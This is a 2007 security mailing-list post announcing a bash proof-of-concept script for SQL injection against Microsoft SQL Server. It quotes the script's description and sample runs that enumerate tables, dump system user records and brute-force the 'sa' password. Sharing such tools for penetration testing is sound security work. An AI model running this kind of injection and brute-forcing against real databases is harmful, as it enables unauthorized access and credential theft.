On Sat, 19 May 2007, winsoc wrote:
Can anyone recommend a quick and cheerful Open Source Tool which will
test websites for SQL Injection, XSS, Remote File Include.
Speaking of SQL injection, just wanted to point out a bash script i put
together while pen-testing some web applications that use MS SQL Server as
back-end:
http://www.0xdeadbeef.info/code/mssql-hax0r
# Proof-of-concept multi-purpose SQL injection script for Microsoft SQL
# Server exploitation. Three operational mode are currently available:
# info (Information Gathetering), dump (Record Dump), and brute (Brute
# Force). You may need to tweak the code a bit to make it fit your needs
# (i.e., modifying the injection string and/or the language used by the
# RDBMS).
You shouldn't expect anything too fancy (it's still v0.1 after all;), but
it does its job:
root@shaolin:~# ./mssql-hax0r info tables+++
DBFoobar
Accounting (id:390494850)
CanoneAnnuo (money)
CodiceFornitore (varchar)
dataInsert (datetime)
GroupId (char) *
GroupInsert (varchar)
idAccount (varchar)
idAnagrafica (int)
[...]
root@shaolin:~# ./mssql-hax0r dump
--------------------------------
SYSUSERS.uid=0
SYSUSERS.name=public
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=1
SYSUSERS.name=dbo
SYSUSERS.password=
--------------------------------
SYSUSERS.uid=2
SYSUSERS.name=guest
SYSUSERS.password=
--------------------------------
3 record(s) dumped.
root@shaolin:~# ./mssql-hax0r brute xxx
Default (empty) password not valid, starting bruteforce.
aaa
bbb
ccc
password
Password of 'sa' user is 'password'!;)
Enjoy,
--
Marco Ivaldi, OPST
Chief Security Officer Data Security Division
@ Mediaservice.net Srl http://mediaservice.net/
------------------------------------------------------------------------
This List Sponsored by: Cenzic
Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!
http://www.cenzic.com/c/2020
------------------------------------------------------------------------
